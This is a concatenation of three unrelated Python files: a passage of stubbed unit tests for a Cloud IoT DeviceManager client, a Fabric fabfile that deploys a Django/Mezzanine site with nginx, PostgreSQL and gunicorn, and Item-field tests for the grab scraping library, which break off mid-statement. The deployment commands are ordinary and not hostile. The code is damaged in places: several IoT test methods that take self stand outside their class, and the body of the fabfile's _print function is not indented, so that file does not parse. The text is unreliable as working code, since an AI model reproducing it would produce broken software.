        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')

        response = client.get_device(name)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.GetDeviceRequest(name=name)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_get_device_exception(self):
        """get_device propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')

        with pytest.raises(CustomException):
            client.get_device(name)

    def test_update_device(self):
        """update_device returns the stubbed device and sends the update mask."""
        # Setup Expected Response
        id_ = 'id3355'
        name = 'name3373707'
        num_id = 1034366860
        blocked = True
        expected_response = {
            'id': id_,
            'name': name,
            'num_id': num_id,
            'blocked': blocked
        }
        expected_response = resources_pb2.Device(**expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        device = {}
        update_mask = {}

        response = client.update_device(device, update_mask)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.UpdateDeviceRequest(
            device=device, update_mask=update_mask)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_update_device_exception(self):
        """update_device propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        device = {}
        update_mask = {}

        with pytest.raises(CustomException):
            client.update_device(device, update_mask)
    def test_delete_device(self):
        """delete_device issues exactly one well-formed delete RPC."""
        channel = ChannelStub()
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')

        client.delete_device(name)

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.DeleteDeviceRequest(name=name)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_delete_device_exception(self):
        """delete_device propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')

        with pytest.raises(CustomException):
            client.delete_device(name)

    def test_list_devices(self):
        """list_devices pages through and yields the stubbed devices."""
        # Setup Expected Response
        next_page_token = ''
        devices_element = {}
        devices = [devices_element]
        expected_response = {
            'next_page_token': next_page_token,
            'devices': devices
        }
        expected_response = device_manager_pb2.ListDevicesResponse(
            **expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')

        # materializing the pager triggers the underlying RPC
        paged_list_response = client.list_devices(parent)
        resources = list(paged_list_response)
        assert len(resources) == 1

        assert expected_response.devices[0] == resources[0]

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.ListDevicesRequest(parent=parent)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_list_devices_exception(self):
        """list_devices surfaces errors when the pager is consumed."""
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')

        paged_list_response = client.list_devices(parent)
        with pytest.raises(CustomException):
            list(paged_list_response)
    def test_modify_cloud_to_device_config(self):
        """modify_cloud_to_device_config returns the stubbed config version."""
        # Setup Expected Response
        version = 351608024
        binary_data_2 = b'-37'
        expected_response = {'version': version, 'binary_data': binary_data_2}
        expected_response = resources_pb2.DeviceConfig(**expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')
        binary_data = b'40'

        response = client.modify_cloud_to_device_config(name, binary_data)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.ModifyCloudToDeviceConfigRequest(
            name=name, binary_data=binary_data)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_modify_cloud_to_device_config_exception(self):
        """modify_cloud_to_device_config propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')
        binary_data = b'40'

        with pytest.raises(CustomException):
            client.modify_cloud_to_device_config(name, binary_data)

    def test_list_device_config_versions(self):
        """list_device_config_versions returns the stubbed response unchanged."""
        # Setup Expected Response
        expected_response = {}
        expected_response = device_manager_pb2.ListDeviceConfigVersionsResponse(
            **expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')

        response = client.list_device_config_versions(name)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.ListDeviceConfigVersionsRequest(
            name=name)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_list_device_config_versions_exception(self):
        """list_device_config_versions propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')

        with pytest.raises(CustomException):
            client.list_device_config_versions(name)
def test_list_device_states(self):
    """A successful call returns the stubbed response via one request."""
    expected_response = device_manager_pb2.ListDeviceStatesResponse()
    stub = ChannelStub(responses=[expected_response])
    api = iot_v1.DeviceManagerClient(channel=stub)
    device_name = api.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')
    response = api.list_device_states(device_name)
    assert response == expected_response
    # Verify the single request carries the expected payload.
    assert len(stub.requests) == 1
    expected_request = device_manager_pb2.ListDeviceStatesRequest(
        name=device_name)
    assert stub.requests[0][1] == expected_request
def test_list_device_states_exception(self):
    """Errors raised by the transport must propagate to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    api = iot_v1.DeviceManagerClient(channel=stub)
    device_name = api.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
                                  '[DEVICE]')
    with pytest.raises(CustomException):
        api.list_device_states(device_name)
def test_set_iam_policy(self):
    """set_iam_policy returns the stubbed policy and issues one request."""
    # The policy proto the fake transport will return.
    expected_response = policy_pb2.Policy(version=351608024, etag=b'21')
    stub = ChannelStub(responses=[expected_response])
    api = iot_v1.DeviceManagerClient(channel=stub)
    registry = api.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
    policy = {}
    response = api.set_iam_policy(registry, policy)
    assert response == expected_response
    assert len(stub.requests) == 1
    expected_request = iam_policy_pb2.SetIamPolicyRequest(
        resource=registry, policy=policy)
    assert stub.requests[0][1] == expected_request
def test_set_iam_policy_exception(self):
    """Errors raised by the transport must propagate to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    api = iot_v1.DeviceManagerClient(channel=stub)
    registry = api.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
    policy = {}
    with pytest.raises(CustomException):
        api.set_iam_policy(registry, policy)
def test_get_iam_policy(self):
    """get_iam_policy returns the stubbed policy and issues one request."""
    expected_response = policy_pb2.Policy(version=351608024, etag=b'21')
    stub = ChannelStub(responses=[expected_response])
    api = iot_v1.DeviceManagerClient(channel=stub)
    registry = api.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
    response = api.get_iam_policy(registry)
    assert response == expected_response
    # Verify the single request carries the expected payload.
    assert len(stub.requests) == 1
    expected_request = iam_policy_pb2.GetIamPolicyRequest(resource=registry)
    assert stub.requests[0][1] == expected_request
def test_get_iam_policy_exception(self):
    """Errors raised by the transport must propagate to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    api = iot_v1.DeviceManagerClient(channel=stub)
    registry = api.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
    with pytest.raises(CustomException):
        api.get_iam_policy(registry)
def test_test_iam_permissions(self):
    """test_iam_permissions returns the stubbed response via one request."""
    expected_response = iam_policy_pb2.TestIamPermissionsResponse()
    stub = ChannelStub(responses=[expected_response])
    api = iot_v1.DeviceManagerClient(channel=stub)
    registry = api.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
    permissions = []
    response = api.test_iam_permissions(registry, permissions)
    assert response == expected_response
    assert len(stub.requests) == 1
    expected_request = iam_policy_pb2.TestIamPermissionsRequest(
        resource=registry, permissions=permissions)
    assert stub.requests[0][1] == expected_request
def test_test_iam_permissions_exception(self):
    """Errors raised by the transport must propagate to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    api = iot_v1.DeviceManagerClient(channel=stub)
    registry = api.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
    permissions = []
    with pytest.raises(CustomException):
        api.test_iam_permissions(registry, permissions)
| |
from __future__ import print_function, unicode_literals
from future.builtins import input, open
import os
import re
import sys
from functools import wraps
from getpass import getpass, getuser
from glob import glob
from contextlib import contextmanager
from posixpath import join
from fabric.api import env, cd, prefix, sudo as _sudo, run as _run, hide, task
from fabric.contrib.files import exists, upload_template
from fabric.colors import yellow, green, blue, red
################
# Config setup #
################

# Only load the project's FABRIC settings dict when actually running
# under fab; importing this module elsewhere stays side-effect free.
conf = {}
if sys.argv[0].split(os.sep)[-1] in ("fab", "fab-script.py"):
    # Ensure we import settings from the current dir
    try:
        conf = __import__("settings", globals(), locals(), [], 0).FABRIC
        try:
            conf["HOSTS"][0]
        except (KeyError, ValueError):
            raise ImportError
    except (ImportError, AttributeError):
        print("Aborting, no hosts defined.")
        exit()

# SSH / credential settings, with interactive fallbacks where sensible.
env.db_pass = conf.get("DB_PASS", None)
env.admin_pass = conf.get("ADMIN_PASS", None)
env.user = conf.get("SSH_USER", getuser())
env.password = conf.get("SSH_PASS", None)
env.key_filename = conf.get("SSH_KEY_PATH", None)
env.hosts = conf.get("HOSTS", [""])

# Remote project layout: one virtualenv per project, with the checkout
# living in a "project" dir inside it.
env.proj_name = conf.get("PROJECT_NAME", os.getcwd().split(os.sep)[-1])
env.venv_home = conf.get("VIRTUALENV_HOME", "/home/%s" % env.user)
env.venv_path = "%s/%s" % (env.venv_home, env.proj_name)
env.proj_dirname = "project"
env.proj_path = "%s/%s" % (env.venv_path, env.proj_dirname)
env.manage = "%s/bin/python %s/project/manage.py" % ((env.venv_path,) * 2)

# Domains served by the site; ssl_disabled becomes a "#" used to comment
# out SSL lines in the nginx template when multiple domains are set.
env.domains = conf.get("DOMAINS", [conf.get("LIVE_HOSTNAME", env.hosts[0])])
env.domains_nginx = " ".join(env.domains)
env.domains_python = ", ".join(["'%s'" % s for s in env.domains])
env.ssl_disabled = "#" if len(env.domains) > 1 else ""
env.repo_url = conf.get("REPO_URL", "")
# Heuristic: a URL starting with "git" or ending ".git" means git,
# anything else is treated as mercurial.
env.git = env.repo_url.startswith("git") or env.repo_url.endswith(".git")
env.reqs_path = conf.get("REQUIREMENTS_PATH", None)
env.gunicorn_port = conf.get("GUNICORN_PORT", 8000)
env.locale = conf.get("LOCALE", "en_US.UTF-8")
env.secret_key = conf.get("SECRET_KEY", "")
env.nevercache_key = conf.get("NEVERCACHE_KEY", "")
##################
# Template setup #
##################

# Each template gets uploaded at deploy time, only if their
# contents has changed, in which case, the reload command is
# also run.
# Keys per entry: local_path (relative to the fabfile or cwd),
# remote_path (may contain %(var)s placeholders filled from env),
# and optional reload_command / owner / mode.
templates = {
    "nginx": {
        "local_path": "deploy/nginx.conf",
        "remote_path": "/etc/nginx/sites-enabled/%(proj_name)s.conf",
        "reload_command": "service nginx restart",
    },
    "supervisor": {
        "local_path": "deploy/supervisor.conf",
        "remote_path": "/etc/supervisor/conf.d/%(proj_name)s.conf",
        "reload_command": "supervisorctl reload",
    },
    "cron": {
        # cron.d entries must be root-owned and not group/world writable,
        # hence the explicit owner and mode.
        "local_path": "deploy/crontab",
        "remote_path": "/etc/cron.d/%(proj_name)s",
        "owner": "root",
        "mode": "600",
    },
    "gunicorn": {
        "local_path": "deploy/gunicorn.conf.py",
        "remote_path": "%(proj_path)s/gunicorn.conf.py",
    },
    "settings": {
        "local_path": "deploy/live_settings.py",
        "remote_path": "%(proj_path)s/local_settings.py",
    },
}
######################################
# Context for virtualenv and project #
######################################
@contextmanager
def virtualenv():
    """
    Puts the wrapped commands inside the project's virtualenv, with the
    venv directory as the working directory.
    """
    activate = "source %s/bin/activate" % env.venv_path
    with cd(env.venv_path), prefix(activate):
        yield
@contextmanager
def project():
    """
    Puts the wrapped commands inside the project checkout directory
    (which also implies the virtualenv being active).
    """
    with virtualenv(), cd(env.proj_dirname):
        yield
@contextmanager
def update_changed_requirements():
    """
    Checks for changes in the requirements file across an update,
    and gets new requirements if changes have occurred.

    Snapshots the requirements file before yielding (the caller performs
    the VCS update inside the block), then compares afterwards.
    """
    reqs_path = join(env.proj_path, env.reqs_path)
    get_reqs = lambda: run("cat %s" % reqs_path, show=False)
    # If no requirements path is configured, skip the before-snapshot
    # entirely; the falsy old_reqs short-circuits everything below.
    old_reqs = get_reqs() if env.reqs_path else ""
    yield
    if old_reqs:
        new_reqs = get_reqs()
        if old_reqs == new_reqs:
            # Unpinned requirements should always be checked.
            for req in new_reqs.split("\n"):
                if req.startswith("-e"):
                    if "@" not in req:
                        # Editable requirement without pinned commit.
                        break
                elif req.strip() and not req.startswith("#"):
                    if not set(">=<") & set(req):
                        # PyPI requirement without version.
                        break
            else:
                # All requirements are pinned.
                return
        # Requirements changed, or at least one was unpinned: reinstall.
        pip("-r %s/%s" % (env.proj_path, env.reqs_path))
###########################################
# Utils and wrappers for various commands #
###########################################
def _print(output):
print()
print(output)
print()
def print_command(command):
    """Echoes *command* locally with shell-prompt style colouring."""
    prompt = blue("$ ", bold=True)
    arrow = red(" ->", bold=True)
    _print(prompt + yellow(command, bold=True) + arrow)
@task
def run(command, show=True):
    """
    Runs a shell command on the remote server.

    Pass ``show=False`` to suppress the local echo of the command.
    """
    if show:
        print_command(command)
    with hide("running"):
        return _run(command)
@task
def sudo(command, show=True):
    """
    Runs a command as sudo on the remote server.

    Pass ``show=False`` to suppress the local echo of the command.
    """
    if show:
        print_command(command)
    with hide("running"):
        return _sudo(command)
def log_call(func):
    """Decorator that prints a banner with the task's name before running it."""
    @wraps(func)
    def logged(*args, **kwargs):
        rule = "-" * len(func.__name__)
        banner = "\n".join([rule, func.__name__, rule])
        _print(green(banner, bold=True))
        return func(*args, **kwargs)
    return logged
def get_templates():
    """
    Returns each of the templates with env vars injected.

    Every string value in each template entry is %-interpolated against
    the fabric ``env`` dict, so placeholders like ``%(proj_name)s``
    resolve to the current project's settings.
    """
    # Dict comprehension replaces the dated dict([(k, v) ...]) idiom.
    return {name: {k: v % env for k, v in data.items()}
            for name, data in templates.items()}
def upload_template_and_reload(name):
    """
    Uploads a template only if it has changed, and if so, reload a
    related service.

    ``name`` is a key into the module-level ``templates`` dict.
    """
    template = get_templates()[name]
    local_path = template["local_path"]
    # Fall back to a path relative to this fabfile when the template
    # isn't found relative to the current working directory.
    if not os.path.exists(local_path):
        project_root = os.path.dirname(os.path.abspath(__file__))
        local_path = os.path.join(project_root, local_path)
    remote_path = template["remote_path"]
    reload_command = template.get("reload_command")
    owner = template.get("owner")
    mode = template.get("mode")
    remote_data = ""
    if exists(remote_path):
        with hide("stdout"):
            remote_data = sudo("cat %s" % remote_path, show=False)
    with open(local_path, "r") as f:
        local_data = f.read()
        # Escape all non-string-formatting-placeholder occurrences of '%':
        local_data = re.sub(r"%(?!\(\w+\)s)", "%%", local_data)
        # Only prompt for the DB password when this template needs it.
        if "%(db_pass)s" in local_data:
            env.db_pass = db_pass()
        local_data %= env
    clean = lambda s: s.replace("\n", "").replace("\r", "").strip()
    # Skip upload (and reload) when the rendered template matches what's
    # already deployed, ignoring line endings and surrounding whitespace.
    if clean(remote_data) == clean(local_data):
        return
    upload_template(local_path, remote_path, env, use_sudo=True, backup=False)
    if owner:
        sudo("chown %s %s" % (owner, remote_path))
    if mode:
        sudo("chmod %s %s" % (mode, remote_path))
    if reload_command:
        sudo(reload_command)
def db_pass():
    """
    Returns the database password, prompting for it the first time.
    """
    env.db_pass = env.db_pass or getpass("Enter the database password: ")
    return env.db_pass
@task
def apt(packages):
    """
    Installs one or more system packages via apt (non-interactive).
    """
    return sudo("apt-get install -y -q %s" % packages)
@task
def pip(packages):
    """
    Installs one or more Python packages inside the virtual environment.
    """
    with virtualenv():
        return sudo("pip install %s" % packages)
def postgres(command):
    """
    Runs the given command as the postgres user.
    """
    # psql invocations aren't echoed here; psql() prints the SQL itself.
    return run("sudo -u root sudo -u postgres %s" % command,
               show=not command.startswith("psql"))
@task
def psql(sql, show=True):
    """
    Runs SQL against the project's database.
    """
    result = postgres('psql -c "%s"' % sql)
    # Echo the raw SQL (rather than the psql wrapper) after running it.
    if show:
        print_command(sql)
    return result
@task
def backup(filename):
    """
    Backs up the project database to ``filename`` via pg_dump.
    """
    dump = "pg_dump -Fc %s > %s" % (env.proj_name, filename)
    return postgres(dump)
@task
def restore(filename):
    """
    Restores the project database from ``filename`` via pg_restore.
    """
    load = "pg_restore -c -d %s %s" % (env.proj_name, filename)
    return postgres(load)
@task
def python(code, show=True):
    """
    Runs Python code in the project's virtual environment, with Django loaded.
    """
    setup = "import os; os.environ[\'DJANGO_SETTINGS_MODULE\']=\'settings\';"
    # Backticks would be interpreted by the remote shell, so escape them.
    escaped = code.replace("`", "\\\`")
    full_code = 'python -c "%s%s"' % (setup, escaped)
    with project():
        result = run(full_code, show=False)
    if show:
        print_command(code)
    return result
def static():
    """
    Returns the live STATIC_ROOT directory.
    """
    # NOTE(review): the remote code uses a Python 2 print statement --
    # presumably the deployed interpreter is Python 2; confirm.
    output = python("from django.conf import settings;"
                    "print settings.STATIC_ROOT", show=False)
    return output.split("\n")[-1]
@task
def manage(command):
    """
    Runs a Django management command via the project's manage.py.
    """
    return run(" ".join([env.manage, command]))
#########################
# Install and configure #
#########################
@task
@log_call
def install():
    """
    Installs the base system and Python requirements for the entire server.
    """
    # Fix the locale first: several packages fail to configure under a
    # broken locale.  The extra run("exit") forces a reconnect so the
    # updated locale takes effect for subsequent commands.
    locale = "LC_ALL=%s" % env.locale
    with hide("stdout"):
        if locale not in sudo("cat /etc/default/locale"):
            sudo("update-locale %s" % locale)
            run("exit")
    sudo("apt-get update -y -q")
    apt("nginx libjpeg-dev python-dev python-setuptools git-core "
        "postgresql libpq-dev memcached supervisor")
    sudo("easy_install pip")
    sudo("pip install virtualenv mercurial")
@task
@log_call
def create():
    """
    Create a new virtual environment for a project.
    Pulls the project's repo from version control, adds system-level
    configs for the project, and initialises the database with the
    live host.

    Returns True on success, False if the user aborts at the
    existing-virtualenv prompt.
    """
    # Create virtualenv
    with cd(env.venv_home):
        if exists(env.proj_name):
            prompt = input("\nVirtualenv exists: %s"
                           "\nWould you like to replace it? (yes/no) "
                           % env.proj_name)
            if prompt.lower() != "yes":
                print("\nAborting!")
                return False
            remove()
        run("virtualenv %s --distribute" % env.proj_name)
        vcs = "git" if env.git else "hg"
        run("%s clone %s %s" % (vcs, env.repo_url, env.proj_path))

    # Create DB and DB user.
    pw = db_pass()
    # Escape single quotes for SQL by doubling them (the previous
    # pw.replace("'", "\'") was a no-op, since "\'" == "'").
    user_sql_args = (env.proj_name, pw.replace("'", "''"))
    user_sql = "CREATE USER %s WITH ENCRYPTED PASSWORD '%s';" % user_sql_args
    psql(user_sql, show=False)
    # Echo the statement with the password shadowed.
    shadowed = "*" * len(pw)
    print_command(user_sql.replace("'%s'" % pw, "'%s'" % shadowed))
    psql("CREATE DATABASE %s WITH OWNER %s ENCODING = 'UTF8' "
         "LC_CTYPE = '%s' LC_COLLATE = '%s' TEMPLATE template0;" %
         (env.proj_name, env.proj_name, env.locale, env.locale))

    # Set up SSL certificate: use any cert/key pair found in deploy/,
    # otherwise generate a self-signed one.
    if not env.ssl_disabled:
        conf_path = "/etc/nginx/conf"
        if not exists(conf_path):
            sudo("mkdir %s" % conf_path)
        with cd(conf_path):
            crt_file = env.proj_name + ".crt"
            key_file = env.proj_name + ".key"
            if not exists(crt_file) and not exists(key_file):
                try:
                    crt_local, = glob(join("deploy", "*.crt"))
                    key_local, = glob(join("deploy", "*.key"))
                except ValueError:
                    # No (or ambiguous) local pair: self-sign for 10 years.
                    parts = (crt_file, key_file, env.domains[0])
                    sudo("openssl req -new -x509 -nodes -out %s -keyout %s "
                         "-subj '/CN=%s' -days 3650" % parts)
                else:
                    upload_template(crt_local, crt_file, use_sudo=True)
                    upload_template(key_local, key_file, use_sudo=True)

    # Set up project: live settings, requirements, initial DB content.
    upload_template_and_reload("settings")
    with project():
        if env.reqs_path:
            pip("-r %s/%s" % (env.proj_path, env.reqs_path))
        pip("gunicorn setproctitle south psycopg2 "
            "django-compressor python-memcached")
        manage("createdb --noinput --nodata")
        # Point the default Site at the primary domain, then make sure a
        # Site row exists for every configured domain.
        python("from django.conf import settings;"
               "from django.contrib.sites.models import Site;"
               "Site.objects.filter(id=settings.SITE_ID).update(domain='%s');"
               % env.domains[0])
        for domain in env.domains:
            python("from django.contrib.sites.models import Site;"
                   "Site.objects.get_or_create(domain='%s');" % domain)
        if env.admin_pass:
            pw = env.admin_pass
            user_py = ("from mezzanine.utils.models import get_user_model;"
                       "User = get_user_model();"
                       "u, _ = User.objects.get_or_create(username='admin');"
                       "u.is_staff = u.is_superuser = True;"
                       "u.set_password('%s');"
                       "u.save();" % pw)
            python(user_py, show=False)
            shadowed = "*" * len(pw)
            print_command(user_py.replace("'%s'" % pw, "'%s'" % shadowed))
    return True
@task
@log_call
def remove():
    """
    Blow away the current project: the virtualenv, every uploaded config
    template, and the database along with its owner role.
    """
    if exists(env.venv_path):
        sudo("rm -rf %s" % env.venv_path)
    for tmpl in get_templates().values():
        deployed = tmpl["remote_path"]
        if exists(deployed):
            sudo("rm %s" % deployed)
    psql("DROP DATABASE IF EXISTS %s;" % env.proj_name)
    psql("DROP USER IF EXISTS %s;" % env.proj_name)
##############
# Deployment #
##############
@task
@log_call
def restart():
    """
    Restart gunicorn worker processes for the project.

    HUPs a running master when a pid file exists; otherwise asks
    supervisor to start the process group.
    """
    pid_path = "%s/gunicorn.pid" % env.proj_path
    if not exists(pid_path):
        sudo("supervisorctl start %s:gunicorn_%s" %
             (env.proj_name, env.proj_name))
    else:
        sudo("kill -HUP `cat %s`" % pid_path)
@task
@log_call
def deploy():
    """
    Deploy latest version of the project.
    Check out the latest version of the project from version
    control, install new requirements, sync and migrate the database,
    collect any new static assets, and restart gunicorn's work
    processes for the project.

    Returns True on success, False if the user aborts at the
    missing-virtualenv prompt.
    """
    if not exists(env.venv_path):
        prompt = input("\nVirtualenv doesn't exist: %s"
                       "\nWould you like to create it? (yes/no) "
                       % env.proj_name)
        if prompt.lower() != "yes":
            print("\nAborting!")
            return False
        create()
    for name in get_templates():
        upload_template_and_reload(name)
    with project():
        # Snapshot DB, static files and current commit so rollback()
        # can restore the pre-deploy state.
        backup("last.db")
        static_dir = static()
        if exists(static_dir):
            run("tar -cf last.tar %s" % static_dir)
        git = env.git
        last_commit = "git rev-parse HEAD" if git else "hg id -i"
        run("%s > last.commit" % last_commit)
        # Reinstall requirements only if the update changed them.
        with update_changed_requirements():
            run("git pull origin master -f" if git else "hg pull && hg up -C")
        manage("collectstatic -v 0 --noinput")
        manage("syncdb --noinput")
        manage("migrate --noinput")
    restart()
    return True
@task
@log_call
def rollback():
    """
    Reverts project state to the last deploy.
    When a deploy is performed, the current state of the project is
    backed up. This includes the last commit checked out, the database,
    and all static files. Calling rollback will revert all of these to
    their state prior to the last deploy.
    """
    with project():
        with update_changed_requirements():
            # Check out the commit recorded by the previous deploy.
            update = "git checkout" if env.git else "hg up -C"
            run("%s `cat last.commit`" % update)
        # Unpack the static files archive next to STATIC_ROOT.
        with cd(join(static(), "..")):
            run("tar -xf %s" % join(env.proj_path, "last.tar"))
        restore("last.db")
    restart()
@task
@log_call
def all():
    """
    Installs everything required on a new system and deploy.
    From the base software, up to the deployed project.

    Note: the name shadows the builtin all() at module level; it is kept
    because fab exposes tasks by function name ("fab all").
    """
    install()
    # Only deploy if create() succeeded (it returns False on user abort).
    if create():
        deploy()
| |
# coding: utf-8
from unittest import TestCase
import os
import sys

# Hack environment to force import "item" module from grab/item.py location
# (the repository root must precede installed packages on sys.path so the
# in-tree grab package wins over a site-packages copy).
root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(0, root)

from lxml.html import fromstring
from grab import Grab, DataNotFound
from grab.item import (Item, IntegerField, StringField, DateTimeField, func_field,
                       FuncField)
from test.util import build_grab
from grab.tools.lxml_tools import get_node_text, parse_html
from grab.selector import XpathSelector
from grab.error import GrabMisuseError
XML = b"""<?xml version='1.0' encoding='utf-8'?>
<bbapi version='1'>
<player id='26982032' retrieved='2012-09-11T07:38:44Z'>
<firstName>Ardeshir</firstName>
<lastName>Lohrasbi</lastName>
<nationality id='89'>Pakistan</nationality>
<age>19</age>
<height>75</height>
<dmi>14300</dmi>
<comment>abc</comment>
<comment_cdata><![CDATA[abc]]></comment_cdata>
<games>
<game name="quake1"></game>
<game name="quake2"></game>
</games>
</player>
</bbapi>
"""
def calculated_func2(item, sel):
    """Field callback: joins the //height text with a per-item call counter."""
    # Track how many times this callback has run for this item instance.
    item.count2 = getattr(item, 'count2', 0) + 1
    return sel.select('//height').text() + '-zoo2-' + str(item.count2)
class Player(Item):
    # XPath-driven fields extracted from the <player> element.
    id = IntegerField('//player/@id')
    # NOTE(review): the query uses lowercase 'firstname' while the fixture
    # has camelCase <firstName>; presumably the HTML DOM builder lowercases
    # tag names so this still matches -- confirm for the XML content type.
    first_name = StringField('//player/firstname')
    retrieved = DateTimeField('//player/@retrieved', '%Y-%m-%dT%H:%M:%SZ')
    comment = StringField('//player/comment')
    comment_cdata = StringField('//player/comment_cdata')
    # Query that matches nothing; used to test DataNotFound behaviour.
    data_not_found = StringField('//data/no/found')

    @func_field()
    def calculated(item, sel):
        # Counts invocations on the item so tests can verify field caching.
        if not hasattr(item, 'count'):
            item.count = 1
        else:
            item.count += 1
        return sel.select('//height').text() + '-zoo-' + str(item.count)

    # Same idea via FuncField with an external callback receiving the item.
    calculated2 = FuncField(calculated_func2, pass_item=True)

    @func_field()
    def height1(item, sel):
        return sel.select('//height').number()

    # Callback without the item argument (pass_item defaults to off).
    height2 = FuncField(lambda sel: sel.select('//height').number())
class GameItem(Item):
    # Instances are located via Meta.find_query; the field queries below
    # are evaluated relative to each matched <game> node.
    class Meta:
        find_query = '//games/game'

    name = StringField('@name')
    names = StringField('@name', multiple=True)
class ItemTestCase(TestCase):
    """Tests for the Item field machinery against the XML player fixture.

    Uses assertEqual throughout: assertEquals is a deprecated alias that
    was removed in Python 3.12.
    """

    def get_item(self, content_type=None):
        """Returns a ``Player`` item parsed from the XML fixture."""
        grab = build_grab()
        if content_type is not None:
            grab.setup(content_type=content_type)
        grab.fake_response(XML)
        player = Player(grab.tree)
        return player

    def test_integer_field(self):
        player = self.get_item()
        self.assertEqual(26982032, player.id)

    def test_string_field(self):
        player = self.get_item()
        self.assertEqual('Ardeshir', player.first_name)

    def test_datetime_field(self):
        player = self.get_item()
        self.assertEqual('2012-09-11 07:38:44', str(player.retrieved))

    def test_item_cache_feature(self):
        player = self.get_item()
        self.assertEqual('75-zoo-1', player.calculated)
        # Should come from the cache: the counter must not increase.
        self.assertEqual('75-zoo-1', player.calculated)
        # Test assigning a value directly.
        player.calculated = 'baz'
        self.assertEqual('baz', player.calculated)
        # Test FuncField.
        self.assertEqual('75-zoo2-1', player.calculated2)
        # Should come from the cache.
        self.assertEqual('75-zoo2-1', player.calculated2)

    def test_dom_builder(self):
        player = self.get_item()
        # By default comment_cdata attribute contains empty string
        # because HTML DOM builder is used by default
        self.assertEqual('abc', player.comment)
        self.assertEqual('', player.comment_cdata)
        # We can control default DOM builder with
        # content_type option
        player = self.get_item(content_type='xml')
        self.assertEqual('abc', player.comment)
        self.assertEqual('abc', player.comment_cdata)
        self.assertRaises(DataNotFound, lambda: player.data_not_found)

    def test_func_field_decorator(self):
        player = self.get_item()
        self.assertEqual(75, player.height1)

    def test_func_field(self):
        player = self.get_item()
        self.assertEqual(75, player.height2)

    def test_get_function(self):
        func = Player.get_function('height1')
        html = '<html><body><height>3'
        self.assertEqual(3, func(XpathSelector(parse_html(html))))
        func = Player.get_function('height2')
        html = '<html><body><height>3'
        self.assertEqual(3, func(XpathSelector(parse_html(html))))

    def test_func_field_warning(self):
        """
        Test that usage of func_field decorators without "()"
        raises exception.
        """
        def foo():
            class TestItem(Item):
                @func_field
                def foo(self, sel):
                    return 'test'
        self.assertRaises(GrabMisuseError, foo)

        def foo():
            class TestItem(Item):
                @func_field()
                def foo(self, sel):
                    return 'test'
            return TestItem(fromstring('<div></div>')).foo
        self.assertEqual('test', foo())

    def test_unknown_selector_type(self):
        class TestItem(Item):
            pass
        TestItem(None)
        self.assertRaises(GrabMisuseError,
                          lambda: TestItem(None, selector_type='Batman Selector'))

    def test_find(self):
        grab = build_grab()
        grab.fake_response(XML)
        games = list(GameItem.find(grab.doc))
        self.assertEqual(['quake1', 'quake2'],
